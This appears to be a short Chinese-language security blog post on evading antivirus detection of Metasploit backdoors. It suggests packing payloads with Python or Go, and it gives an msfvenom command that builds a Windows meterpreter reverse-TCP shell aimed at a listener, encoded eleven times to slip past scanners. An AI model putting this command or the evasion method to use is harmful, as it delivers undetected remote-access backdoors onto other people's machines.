HackPluto's Blog

msf恶意代码免杀总结

字数统计: 242阅读时长: 1 min
2019/09/20 Share

前言

msf是一个很强大的工具,我经常会在渗透用它来反弹shell,不过它生成的反弹后门会被不少杀软kill,这篇博客我总结一些MSF中的免杀方法

py,go打包exe法

我以前接触过一款python的远控,并用pyinstaller打包成了exe(缺点是体积太过庞大),惊奇的是,杀毒软件不杀它,然后自己想着其他语言是不是也会这样,于是我用golang写了一个简易版nc反弹,编译之后,也是不查杀的。python和golang有一个共同点,就是可以用来内联C编程,所以C语言的shellcode按理说应该会达到同样的效果。

1
msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 -f py > 1.py

建议是生成32位的,如果想生成64位也可以,-e x86/shikata_ga_nai -i 11是指用x86/shikata_ga_nai编码迭代11次,然后生成py文件。

CATALOG
  1. 1. 前言
  2. 2. py,go打包exe法